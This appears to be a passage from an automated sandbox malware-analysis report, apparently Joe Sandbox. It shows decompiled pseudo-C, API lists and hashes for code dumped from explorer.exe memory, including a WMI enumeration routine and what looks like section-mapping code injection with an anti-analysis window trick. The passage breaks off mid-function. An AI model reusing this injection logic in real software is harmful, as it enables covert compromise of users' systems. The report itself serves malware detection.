                            0x0008d10f
                            0x0008d113
                            0x0008d11a
                            0x0008d11b
                            0x0008d128
                            0x0008d12a
                            0x0008d12f
                            0x0008d13c
                            0x0008d13e
                            0x0008d13e
                            0x0008d140
                            0x0008d14a
                            0x0008d156
                            0x0008d166
                            0x0008d16c
                            0x0008d172
                            0x0008d174
                            0x0008d185
                            0x0008d18b
                            0x0008d191
                            0x0008d196
                            0x0008d19c
                            0x0008d1a2
                            0x0008d1a7
                            0x0008d1ac
                            0x0008d1ac
                            0x0008d1b2
                            0x0008d1b2
                            0x0008d1bb
                            0x0008d1c7
                            0x0008d1cf
                            0x0008d1d3
                            0x0008d1d3
                            0x0008d1cf
                            0x0008d1d7
                            0x0008d1dd
                            0x0008d1e3
                            0x0008d1ea
                            0x0008d1fb
                            0x0008d201
                            0x0008d209
                            0x0008d210
                            0x0008d223
                            0x0008d229
                            0x0008d22e
                            0x0008d231
                            0x0008d234
                            0x0008d23a
                            0x0008d240
                            0x0008d242
                            0x0008d248
                            0x0008d251
                            0x0008d254
                            0x0008d254
                            0x0008d257
                            0x0008d25f
                            0x0008d26a
                            0x0008d270
                            0x0008d261
                            0x0008d263
                            0x0008d263
                            0x0008d279
                            0x0008d279
                            0x0008d27f
                            0x0008d287
                            0x0008d292
                            0x0008d297
                            0x0008d29d
                            0x0008d29f
                            0x0008d2ac
                            0x0008d2ad
                            0x0008d2ae
                            0x0008d2b9
                            0x0008d2bb
                            0x0008d2c2
                            0x0008d2c2
                            0x0008d2cc
                            0x0008d2d1
                            0x0008d2d6
                            0x0008d2d6
                            0x0008d2dc
                            0x0008d2e3
                            0x0008d2e4
                            0x0008d2f1
                            0x0008d304
                            0x0008d309
                            0x0008d30e
                            0x0008d317
                            0x0008d317
                            0x0008d31d
                            0x0008d322
                            0x0008d328
                            0x0008d32e
                            0x0008d333
                            0x0008d33c
                            0x0008d33e
                            0x0008d345
                            0x0008d345
                            0x0008d34b
                            0x0008d353
                            0x0008d358
                            0x0008d359
                            0x0008d35e
                            0x0008d367
                            0x0008d369
                            0x0008d374
                            0x0008d374
                            0x0008d37d
                            0x0008d385
                            0x0008d38c
                            0x0008d391
                            0x0008d3a0
                            0x0008d3b8
                            0x0008d3bf
                            0x0008d3cd
                            0x0008d3df
                            0x0008d3e6
                            0x0008d3f3
                            0x00000000

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetCurrentProcessId.KERNEL32 ref: 0008D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                            • GetCurrentProcess.KERNEL32 ref: 0008D09F
                            • GetLastError.KERNEL32 ref: 0008D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                            • GetLastError.KERNEL32 ref: 0008D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                            • GetCurrentProcess.KERNEL32 ref: 0008D20E
                            • memset.MSVCRT ref: 0008D229
                            • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                            • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 3876402152-2706916422
                            • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                            • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0008D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00088604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0008861A( &_v60, 0xfffffffe);
					E0008D5D7( &_v104);
					return _t320;
				}
				_t165 = E000895E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000895E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000892E5(_t165);
				_v60 = _t322;
				E000885D5( &_v52);
				E000885D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000895E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000885D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0008861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000891E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00088698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0008861A(_t136, 0);
								E0008861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000891E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000895E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000895E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000885D5( &_v92);
											E000885D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00089640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000895E1(_t283, 0x219);
										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000885D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000891E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0008DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0008861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                            0x0008db45
                            0x0008db4b
                            0x0008db52
                            0x0008db55
                            0x0008db58
                            0x0008db5d
                            0x0008db5f
                            0x0008db64
                            0x0008dfac
                            0x0008dfac
                            0x0008db71
                            0x0008db73
                            0x0008db76
                            0x0008db79
                            0x0008df91
                            0x0008df97
                            0x0008dfa1
                            0x00000000
                            0x0008dfa6
                            0x0008db84
                            0x0008db8b
                            0x0008db92
                            0x0008db95
                            0x0008db9a
                            0x0008db9c
                            0x0008db9f
                            0x0008dba2
                            0x0008dba3
                            0x0008dbac
                            0x0008dbb2
                            0x0008dbb5
                            0x0008dbbe
                            0x0008dbc3
                            0x0008dbc8
                            0x0008dbdf
                            0x0008dbec
                            0x0008dbef
                            0x0008dbf6
                            0x0008dbfb
                            0x0008dc02
                            0x0008dc07
                            0x0008dc0e
                            0x0008dc10
                            0x0008dc1c
                            0x0008dc1f
                            0x0008dc21
                            0x0008df81
                            0x0008df82
                            0x0008df8b
                            0x00000000
                            0x0008df8b
                            0x0008dc27
                            0x0008dc2a
                            0x0008dc2d
                            0x0008dc30
                            0x0008dc32
                            0x0008df4d
                            0x0008df50
                            0x0008df53
                            0x0008df55
                            0x0008df77
                            0x0008df7c
                            0x0008df57
                            0x0008df5a
                            0x0008df65
                            0x0008df6c
                            0x0008df6c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008dc38
                            0x0008dc38
                            0x0008dc4a
                            0x0008dc4d
                            0x0008dc4f
                            0x00000000
                            0x00000000
                            0x0008dc57
                            0x0008dc5a
                            0x0008dc5d
                            0x0008dc60
                            0x0008dc63
                            0x0008dc66
                            0x00000000
                            0x00000000
                            0x0008dc6c
                            0x0008dc7a
                            0x0008dc7d
                            0x0008dc7f
                            0x0008dc98
                            0x0008dca7
                            0x0008dcaf
                            0x0008dcaf
                            0x0008dcb2
                            0x0008dcb9
                            0x0008dcbd
                            0x0008dcc3
                            0x0008dcc5
                            0x0008df35
                            0x0008df3b
                            0x0008df41
                            0x0008df44
                            0x0008df44
                            0x00000000
                            0x0008df44
                            0x0008dcd4
                            0x0008dce8
                            0x0008dcec
                            0x0008dcee
                            0x0008dcf3
                            0x0008df02
                            0x0008df08
                            0x0008df13
                            0x0008df1e
                            0x0008df24
                            0x0008df2a
                            0x0008df2d
                            0x00000000
                            0x0008df2d
                            0x0008dcf9
                            0x0008ded0
                            0x0008ded0
                            0x0008ded3
                            0x0008ded6
                            0x00000000
                            0x00000000
                            0x0008dd01
                            0x0008dd09
                            0x0008dd10
                            0x0008dd16
                            0x0008dd18
                            0x00000000
                            0x00000000
                            0x0008dd21
                            0x0008dd36
                            0x0008dd3c
                            0x0008dd45
                            0x0008dd48
                            0x0008dd4b
                            0x0008dd4d
                            0x0008dec3
                            0x0008dec6
                            0x0008decf
                            0x0008decf
                            0x00000000
                            0x0008decf
                            0x0008dd5d
                            0x0008dd60
                            0x0008dd67
                            0x0008dd6d
                            0x0008dd70
                            0x0008dd73
                            0x0008dd76
                            0x0008dd79
                            0x0008ddb5
                            0x0008ddb5
                            0x0008ddb8
                            0x0008de64
                            0x0008de78
                            0x0008de88
                            0x0008de8c
                            0x0008de8e
                            0x0008dea5
                            0x0008dea9
                            0x0008deb2
                            0x0008debd
                            0x00000000
                            0x0008debd
                            0x0008de94
                            0x0008de95
                            0x0008de9a
                            0x0008de9a
                            0x0008de9c
                            0x0008de9d
                            0x0008dea2
                            0x00000000
                            0x0008dea2
                            0x0008ddbe
                            0x0008ddbe
                            0x0008ddc1
                            0x0008de2c
                            0x0008de40
                            0x0008de50
                            0x0008de54
                            0x0008de56
                            0x00000000
                            0x00000000
                            0x0008de5c
                            0x0008de5d
                            0x00000000
                            0x0008de5d
                            0x0008ddc3
                            0x0008ddc3
                            0x0008ddc6
                            0x00000000
                            0x00000000
                            0x0008ddc8
                            0x0008ddcb
                            0x00000000
                            0x00000000
                            0x0008ddcd
                            0x0008ddcd
                            0x0008ddd3
                            0x0008ddef
                            0x0008ddfe
                            0x0008de07
                            0x0008de0c
                            0x0008de0f
                            0x0008de15
                            0x0008de15
                            0x0008de1a
                            0x0008de26
                            0x00000000
                            0x0008de26
                            0x0008ddd8
                            0x00000000
                            0x0008ddd8
                            0x0008dd7b
                            0x0008dda2
                            0x0008dda7
                            0x0008ddac
                            0x0008ddae
                            0x0008ddae
                            0x00000000
                            0x0008ddac
                            0x0008dd7d
                            0x0008dd7d
                            0x0008dd80
                            0x00000000
                            0x00000000
                            0x0008dd86
                            0x0008dd86
                            0x0008dd89
                            0x00000000
                            0x00000000
                            0x0008dd8f
                            0x0008dd8f
                            0x0008dd92
                            0x00000000
                            0x00000000
                            0x0008dd98
                            0x0008dd9b
                            0x00000000
                            0x00000000
                            0x0008dd9d
                            0x00000000
                            0x0008dd9d
                            0x0008dedf
                            0x0008dee5
                            0x0008deeb
                            0x0008deee
                            0x0008def1
                            0x0008def1
                            0x0008def4
                            0x0008def5
                            0x0008def8
                            0x0008defa
                            0x00000000
                            0x00000000
                            0x0008df4a
                            0x0008df4a
                            0x00000000
                            0x0008df4a
                            0x0008dc81
                            0x0008dc87
                            0x00000000
                            0x0008dc87
                            0x0008df47
                            0x00000000
                            0x0008dbca
                            0x0008dbcf
                            0x0008dbd4
                            0x00000000
                            0x0008dbd8

                            APIs
                              • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                              • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                              • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                              • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                              • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                            • SysFreeString.OLEAUT32(?), ref: 0008DF82
                            • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 1290676130-1412513891
                            • Opcode ID: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                            • Opcode Fuzzy Hash: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008C6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0x9e688; // 0xb0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E0008E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0x9e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0x9e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0x9e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0x9e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00088669( *0x9e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0x9e684; // 0x286f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0x9e684; // 0x286f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E0008861A( &_v32, 0x1ac4);
					_t141 =  *0x9e688; // 0xb0000
					 *0x9e688 = _t131;
					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E0008C63F(_v12, _v8, _v36);
					 *0x9e688 = _t141;
					goto L14;
				}
			}


































                            0x0008c6c6
                            0x0008c6cd
                            0x0008c6cf
                            0x0008c6d1
                            0x0008c6d3
                            0x0008c6d6
                            0x0008c6d9
                            0x0008c6dc
                            0x0008c6df
                            0x0008c6e2
                            0x0008c6e5
                            0x0008c6ef
                            0x0008c6f2
                            0x0008c6f9
                            0x0008c6fe
                            0x0008c6fe
                            0x0008c704
                            0x0008c706
                            0x0008c70f
                            0x0008c8b5
                            0x0008c8b9
                            0x0008c8be
                            0x0008c8c4
                            0x0008c8c7
                            0x0008c8c7
                            0x0008c8cb
                            0x0008c8d0
                            0x0008c8d5
                            0x0008c8e2
                            0x0008c8e2
                            0x0008c8eb
                            0x0008c8ed
                            0x0008c8f5
                            0x0008c8f5
                            0x0008c8fc
                            0x0008c8fc
                            0x0008c718
                            0x0008c719
                            0x0008c71e
                            0x0008c724
                            0x0008c726
                            0x0008c727
                            0x0008c728
                            0x0008c72d
                            0x0008c72e
                            0x0008c738
                            0x00000000
                            0x00000000
                            0x0008c743
                            0x0008c74d
                            0x0008c757
                            0x0008c75a
                            0x0008c760
                            0x0008c767
                            0x0008c768
                            0x0008c769
                            0x0008c772
                            0x0008c773
                            0x0008c774
                            0x0008c776
                            0x0008c779
                            0x0008c77c
                            0x0008c77f
                            0x0008c782
                            0x0008c78e
                            0x0008c7b0
                            0x0008c7b8
                            0x0008c7bb
                            0x0008c7c6
                            0x0008c7c6
                            0x0008c7b8
                            0x0008c7cc
                            0x0008c7d5
                            0x0008c7d7
                            0x0008c7d8
                            0x0008c7da
                            0x0008c7db
                            0x0008c7dc
                            0x0008c7dd
                            0x0008c7e1
                            0x0008c7e8
                            0x0008c7e9
                            0x0008c7f1
                            0x0008c8b2
                            0x00000000
                            0x0008c7f7
                            0x0008c7f7
                            0x0008c7f9
                            0x0008c7fa
                            0x0008c7ff
                            0x0008c800
                            0x0008c801
                            0x0008c802
                            0x0008c803
                            0x0008c809
                            0x0008c80a
                            0x0008c80f
                            0x0008c810
                            0x0008c818
                            0x00000000
                            0x00000000
                            0x0008c82e
                            0x0008c830
                            0x0008c837
                            0x00000000
                            0x00000000
                            0x0008c848
                            0x0008c84e
                            0x0008c856
                            0x0008c859
                            0x0008c85f
                            0x0008c86f
                            0x0008c87b
                            0x0008c880
                            0x0008c886
                            0x0008c896
                            0x0008c8a2
                            0x0008c8aa
                            0x00000000
                            0x0008c8aa

                            APIs
                            • RegisterClassExA.USER32 ref: 0008C785
                            • CreateWindowExA.USER32 ref: 0008C7B0
                            • DestroyWindow.USER32 ref: 0008C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                            • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 3082384575-2319545179
                            • Opcode ID: 02bb1ad92d60b0a51ae2d737851878b8f1f48e9aba036c56837a39e0fe15ab61
                            • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                            • Opcode Fuzzy Hash: 02bb1ad92d60b0a51ae2d737851878b8f1f48e9aba036c56837a39e0fe15ab61
                            • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00085F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000885EF();
				_t19 = E0008980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00088F78();
					GetModuleHandleA(0);
